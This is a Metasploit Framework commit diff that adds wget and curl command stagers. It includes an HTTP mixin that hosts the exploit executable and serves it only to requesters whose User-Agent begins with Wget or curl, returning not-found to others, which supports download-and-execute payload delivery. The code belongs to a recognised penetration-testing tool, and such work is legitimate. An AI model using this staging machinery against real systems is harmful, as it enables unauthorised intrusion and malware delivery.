Land rapid7#7758, Add HTTP CmdStagers - wget and curl

Brent Cook · Brent Cook · commit d2624ef57430 · 2016-12-30T02:13:45.000-06:00
diff --git a/Gemfile.lock b/Gemfile.lock
@@ -250,7 +250,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.4)
+    rex-exploitation (0.1.7)
       jsobfu
       metasm
       rex-arch
diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
@@ -1,15 +1,15 @@
 # -*- coding: binary -*-
 
 require 'rex/exploitation/cmdstager'
-require 'msf/core/exploit/exe'
-require 'msf/base/config'
+require 'msf/core/exploit/cmdstager/http'
 
 module Msf
 
 # This mixin provides an interface to generating cmdstagers
 module Exploit::CmdStager
 
   include Msf::Exploit::EXE
+  include Msf::Exploit::CmdStager::Http
 
   # Constant for stagers - used when creating an stager instance.
   STAGERS = {
@@ -21,7 +21,9 @@ module Exploit::CmdStager
     :vbs => Rex::Exploitation::CmdStagerVBS,
     :vbs_adodb => Rex::Exploitation::CmdStagerVBS,
     :certutil => Rex::Exploitation::CmdStagerCertutil,
-    :tftp => Rex::Exploitation::CmdStagerTFTP
+    :tftp => Rex::Exploitation::CmdStagerTFTP,
+    :wget => Rex::Exploitation::CmdStagerWget,
+    :curl => Rex::Exploitation::CmdStagerCurl
   }
 
   # Constant for decoders - used when checking the default flavor decoder.
@@ -124,6 +126,11 @@ def generate_cmdstager(opts = {}, pl = nil)
     end
 
     self.stager_instance = create_stager
+
+    if stager_instance.respond_to?(:http?) && stager_instance.http?
+      opts[:payload_uri] = start_service(opts)
+    end
+
     cmd_list = stager_instance.generate(opts_with_decoder(opts))
 
     if cmd_list.nil? || cmd_list.length.zero?
diff --git a/lib/msf/core/exploit/cmdstager/http.rb b/lib/msf/core/exploit/cmdstager/http.rb
@@ -0,0 +1,38 @@
+# -*- coding: binary -*-
+
+require 'msf/core/exploit/tcp_server'
+require 'msf/core/exploit/http/server'
+
+module Msf::Exploit::CmdStager
+module Http
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Stance' => Msf::Exploit::Stance::Aggressive
+    ))
+  end
+
+  def start_service(opts = {})
+    datastore_ssl = datastore['SSL']
+    datastore['SSL'] = !!opts[:ssl]
+
+    super
+
+    payload_uri = get_uri
+    datastore['SSL'] = datastore_ssl
+
+    payload_uri
+  end
+
+  def on_request_uri(cli, request)
+    if request['User-Agent'] =~ /^(?:Wget|curl)/
+      send_response(cli, exe)
+    else
+      send_not_found(cli)
+    end
+  end
+
+end
+end
